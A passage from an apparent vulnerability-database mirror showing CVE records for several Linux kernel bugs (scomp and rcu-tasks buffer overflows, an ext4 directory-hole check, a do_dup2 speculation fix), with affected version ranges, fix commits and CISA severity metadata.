                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.75",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.14",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.2",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: scomp - fix req-\u003edst buffer overflow\n\nThe req-\u003edst buffer size should be checked before copying from the\nscomp_scratch-\u003edst to avoid req-\u003edst buffer overflow problem."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:39:52.034Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1142d65c5b881590962ad763f94505b6dd67d2fe"
        },
        {
          "url": "https://git.kernel.org/stable/c/e0e3f4a18784182cfe34e20c00eca11e78d53e76"
        },
        {
          "url": "https://git.kernel.org/stable/c/4518dc468cdd796757190515a9be7408adc8911e"
        },
        {
          "url": "https://git.kernel.org/stable/c/a5f2f91b3fd7387e5102060809316a0f8f0bc625"
        },
        {
          "url": "https://git.kernel.org/stable/c/4df0c942d04a67df174195ad8082f6e30e7f71a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d9e5bed036a7f9e2062a137e97e3c1e77fb8759"
        },
        {
          "url": "https://git.kernel.org/stable/c/71c6670f9f032ec67d8f4e3f8db4646bf5a62883"
        },
        {
          "url": "https://git.kernel.org/stable/c/744e1885922a9943458954cfea917b31064b4131"
        }
      ],
      "title": "crypto: scomp - fix req-\u003edst buffer overflow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52612",
    "datePublished": "2024-03-18T10:07:47.204Z",
    "dateReserved": "2024-03-06T09:52:12.088Z",
    "dateUpdated": "2025-05-04T07:39:52.034Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38577 (GCVE-0-2024-38577)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:37 – Updated: 2025-11-03 21:55

Title

rcu-tasks: Fix show_rcu_tasks_trace_gp_kthread buffer overflow

Summary

In the Linux kernel, the following vulnerability has been resolved: rcu-tasks: Fix show_rcu_tasks_trace_gp_kthread buffer overflow There is a possibility of buffer overflow in show_rcu_tasks_trace_gp_kthread() if counters, passed to sprintf() are huge. Counter numbers, needed for this are unrealistically high, but buffer overflow is still possible. Use snprintf() with buffer size instead of sprintf(). Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/17c43211d45f13d1b…
	https://git.kernel.org/stable/c/af7b560c88fb42009…
	https://git.kernel.org/stable/c/08186d0c5fb64a1cc…
	https://git.kernel.org/stable/c/32d988f48ed287e67…
	https://git.kernel.org/stable/c/6593d857ce5b5b802…
	https://git.kernel.org/stable/c/1a240e138071b2594…
	https://git.kernel.org/stable/c/cc5645fddb0ce2849…

Impacted products

Vendor

Product

Version

Linux

Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < 17c43211d45f13d1badea3942b76bf16bcc49281 (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < af7b560c88fb420099e29890aa682b8a3efc8784 (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < 08186d0c5fb64a1cc4b43e009314ee6b173ed222 (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < 32d988f48ed287e676a29a15ac30701c35849aec (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < 6593d857ce5b5b802fb73d8091ac9c84b92c1697 (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < 1a240e138071b25944ded0f5b3e357aa99fabcb7 (git)
Affected: edf3775f0ad66879796f594983163f672c4bf1a2 , < cc5645fddb0ce28492b15520306d092730dffa48 (git)

Linux

Affected: 5.8
Unaffected: 0 , < 5.8 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:55:49.034Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/08186d0c5fb64a1cc4b43e009314ee6b173ed222"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/32d988f48ed287e676a29a15ac30701c35849aec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6593d857ce5b5b802fb73d8091ac9c84b92c1697"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1a240e138071b25944ded0f5b3e357aa99fabcb7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc5645fddb0ce28492b15520306d092730dffa48"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38577",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:14:09.560635Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:55.793Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/rcu/tasks.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "17c43211d45f13d1badea3942b76bf16bcc49281",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "af7b560c88fb420099e29890aa682b8a3efc8784",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "08186d0c5fb64a1cc4b43e009314ee6b173ed222",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "32d988f48ed287e676a29a15ac30701c35849aec",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "6593d857ce5b5b802fb73d8091ac9c84b92c1697",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "1a240e138071b25944ded0f5b3e357aa99fabcb7",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            },
            {
              "lessThan": "cc5645fddb0ce28492b15520306d092730dffa48",
              "status": "affected",
              "version": "edf3775f0ad66879796f594983163f672c4bf1a2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/rcu/tasks.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.8"
            },
            {
              "lessThan": "5.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu-tasks: Fix show_rcu_tasks_trace_gp_kthread buffer overflow\n\nThere is a possibility of buffer overflow in\nshow_rcu_tasks_trace_gp_kthread() if counters, passed\nto sprintf() are huge. Counter numbers, needed for this\nare unrealistically high, but buffer overflow is still\npossible.\n\nUse snprintf() with buffer size instead of sprintf().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:14:29.816Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/17c43211d45f13d1badea3942b76bf16bcc49281"
        },
        {
          "url": "https://git.kernel.org/stable/c/af7b560c88fb420099e29890aa682b8a3efc8784"
        },
        {
          "url": "https://git.kernel.org/stable/c/08186d0c5fb64a1cc4b43e009314ee6b173ed222"
        },
        {
          "url": "https://git.kernel.org/stable/c/32d988f48ed287e676a29a15ac30701c35849aec"
        },
        {
          "url": "https://git.kernel.org/stable/c/6593d857ce5b5b802fb73d8091ac9c84b92c1697"
        },
        {
          "url": "https://git.kernel.org/stable/c/1a240e138071b25944ded0f5b3e357aa99fabcb7"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc5645fddb0ce28492b15520306d092730dffa48"
        }
      ],
      "title": "rcu-tasks: Fix show_rcu_tasks_trace_gp_kthread buffer overflow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38577",
    "datePublished": "2024-06-19T13:37:35.797Z",
    "dateReserved": "2024-06-18T19:36:34.926Z",
    "dateUpdated": "2025-11-03T21:55:49.034Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42304 (GCVE-0-2024-42304)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:09 – Updated: 2025-11-03 22:04

Title

ext4: make sure the first directory block is not a hole

Summary

In the Linux kernel, the following vulnerability has been resolved: ext4: make sure the first directory block is not a hole The syzbot constructs a directory that has no dirblock but is non-inline, i.e. the first directory block is a hole. And no errors are reported when creating files in this directory in the following flow. ext4_mknod ... ext4_add_entry // Read block 0 ext4_read_dirblock(dir, block, DIRENT) bh = ext4_bread(NULL, inode, block, 0) if (!bh && (type == INDEX || type == DIRENT_HTREE)) // The first directory block is a hole // But type == DIRENT, so no error is reported. After that, we get a directory block without '.' and '..' but with a valid dentry. This may cause some code that relies on dot or dotdot (such as make_indexed_dir()) to crash. Therefore when ext4_read_dirblock() finds that the first directory block is a hole report that the filesystem is corrupted and return an error to avoid loading corrupted data from disk causing something bad.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d81d7e347d1f1f48a…
	https://git.kernel.org/stable/c/e02f9941e8c011aa3…
	https://git.kernel.org/stable/c/de2a011a13a46468a…
	https://git.kernel.org/stable/c/9771e3d8365ae1dd5…
	https://git.kernel.org/stable/c/b609753cbbd38f8c0…
	https://git.kernel.org/stable/c/c3893d9de8ee153ba…
	https://git.kernel.org/stable/c/299bc6ffa57e04e74…
	https://git.kernel.org/stable/c/f9ca51596bbfd0f9c…

Impacted products

Vendor

Product

Version

Linux

Affected: 3a17ca864baffc0c6f6e8aad525aa4365775a193 , < d81d7e347d1f1f48a5634607d39eb90c161c8afe (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < e02f9941e8c011aa3eafa799def6a134ce06bcfa (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < de2a011a13a46468a6e8259db58b1b62071fe136 (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < 9771e3d8365ae1dd5e8846a204cb9af14e3e656a (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < b609753cbbd38f8c0affd4956c0af178348523ac (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < c3893d9de8ee153baac56d127d844103488133b5 (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < 299bc6ffa57e04e74c6cce866d6c0741fb4897a1 (git)
Affected: 4e19d6b65fb4fc42e352ce9883649e049da14743 , < f9ca51596bbfd0f9c386dd1c613c394c78d9e5e6 (git)
Affected: 3f0307b0d2d8b333a6964fc4c820dc86896fd1cf (git)
Affected: 514631c2225c1fd556c799cc1893fb27b0f48f00 (git)
Affected: 7f1f86276515f6816a98f6ca3ef99c827d54642f (git)
Affected: 5021b7a5bdd6bb859eb648c3da71cdd6aae1d133 (git)

Linux

Affected: 5.3
Unaffected: 0 , < 5.3 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42304",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:10:22.365835Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:28.095Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:04:09.091Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/namei.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d81d7e347d1f1f48a5634607d39eb90c161c8afe",
              "status": "affected",
              "version": "3a17ca864baffc0c6f6e8aad525aa4365775a193",
              "versionType": "git"
            },
            {
              "lessThan": "e02f9941e8c011aa3eafa799def6a134ce06bcfa",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "de2a011a13a46468a6e8259db58b1b62071fe136",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "9771e3d8365ae1dd5e8846a204cb9af14e3e656a",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "b609753cbbd38f8c0affd4956c0af178348523ac",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "c3893d9de8ee153baac56d127d844103488133b5",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "299bc6ffa57e04e74c6cce866d6c0741fb4897a1",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "lessThan": "f9ca51596bbfd0f9c386dd1c613c394c78d9e5e6",
              "status": "affected",
              "version": "4e19d6b65fb4fc42e352ce9883649e049da14743",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "3f0307b0d2d8b333a6964fc4c820dc86896fd1cf",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "514631c2225c1fd556c799cc1893fb27b0f48f00",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "7f1f86276515f6816a98f6ca3ef99c827d54642f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "5021b7a5bdd6bb859eb648c3da71cdd6aae1d133",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/namei.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.3"
            },
            {
              "lessThan": "5.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.19.62",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.187",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.135",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.1.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.2.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: make sure the first directory block is not a hole\n\nThe syzbot constructs a directory that has no dirblock but is non-inline,\ni.e. the first directory block is a hole. And no errors are reported when\ncreating files in this directory in the following flow.\n\n    ext4_mknod\n     ...\n      ext4_add_entry\n        // Read block 0\n        ext4_read_dirblock(dir, block, DIRENT)\n          bh = ext4_bread(NULL, inode, block, 0)\n          if (!bh \u0026\u0026 (type == INDEX || type == DIRENT_HTREE))\n          // The first directory block is a hole\n          // But type == DIRENT, so no error is reported.\n\nAfter that, we get a directory block without \u0027.\u0027 and \u0027..\u0027 but with a valid\ndentry. This may cause some code that relies on dot or dotdot (such as\nmake_indexed_dir()) to crash.\n\nTherefore when ext4_read_dirblock() finds that the first directory block\nis a hole report that the filesystem is corrupted and return an error to\navoid loading corrupted data from disk causing something bad."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:00.209Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d81d7e347d1f1f48a5634607d39eb90c161c8afe"
        },
        {
          "url": "https://git.kernel.org/stable/c/e02f9941e8c011aa3eafa799def6a134ce06bcfa"
        },
        {
          "url": "https://git.kernel.org/stable/c/de2a011a13a46468a6e8259db58b1b62071fe136"
        },
        {
          "url": "https://git.kernel.org/stable/c/9771e3d8365ae1dd5e8846a204cb9af14e3e656a"
        },
        {
          "url": "https://git.kernel.org/stable/c/b609753cbbd38f8c0affd4956c0af178348523ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/c3893d9de8ee153baac56d127d844103488133b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/299bc6ffa57e04e74c6cce866d6c0741fb4897a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/f9ca51596bbfd0f9c386dd1c613c394c78d9e5e6"
        }
      ],
      "title": "ext4: make sure the first directory block is not a hole",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42304",
    "datePublished": "2024-08-17T09:09:10.545Z",
    "dateReserved": "2024-07-30T07:40:12.272Z",
    "dateUpdated": "2025-11-03T22:04:09.091Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42265 (GCVE-0-2024-42265)

Vulnerability from cvelistv5 – Published: 2024-08-17 08:54 – Updated: 2026-01-05 10:52

Title

protect the fetch of ->fd[fd] in do_dup2() from mispredictions

Summary

In the Linux kernel, the following vulnerability has been resolved: protect the fetch of ->fd[fd] in do_dup2() from mispredictions both callers have verified that fd is not greater than ->max_fds; however, misprediction might end up with tofree = fdt->fd[fd]; being speculatively executed. That's wrong for the same reasons why it's wrong in close_fd()/file_close_fd_locked(); the same solution applies - array_index_nospec(fd, fdt->max_fds) could differ from fd only in case of speculative execution on mispredicted path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ed42e8ff509d2a61c…
	https://git.kernel.org/stable/c/41a6c31df77bd8e05…
	https://git.kernel.org/stable/c/08775b3d6ed117cf4…
	https://git.kernel.org/stable/c/3f480493550b6a23d…
	https://git.kernel.org/stable/c/5db999fff545b924b…
	https://git.kernel.org/stable/c/da72e783afd27d9f4…
	https://git.kernel.org/stable/c/1171ceccabfd596ca…
	https://git.kernel.org/stable/c/8aa37bde1a7b64581…

Impacted products

Vendor

Product

Version

Linux

Affected: 8280d16172243702ed43432f826ca6130edb4086 , < ed42e8ff509d2a61c6642d1825032072dab79f26 (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 41a6c31df77bd8e050136b0a200b537da9e1084a (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 08775b3d6ed117cf4518754ec7300ee42b6a5368 (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 3f480493550b6a23d3a65d095d6569d4a7f56a0f (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 5db999fff545b924b24c9afd368ef5c17279b176 (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < da72e783afd27d9f487836b2e6738146c0edd149 (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 1171ceccabfd596ca370c5d2cbb47d110c3f2fe1 (git)
Affected: 8280d16172243702ed43432f826ca6130edb4086 , < 8aa37bde1a7b645816cda8b80df4753ecf172bf1 (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.104 , ≤ 6.1.* (semver)
Unaffected: 6.6.45 , ≤ 6.6.* (semver)
Unaffected: 6.10.4 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42265",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:12:30.860612Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:05.845Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:59.813Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
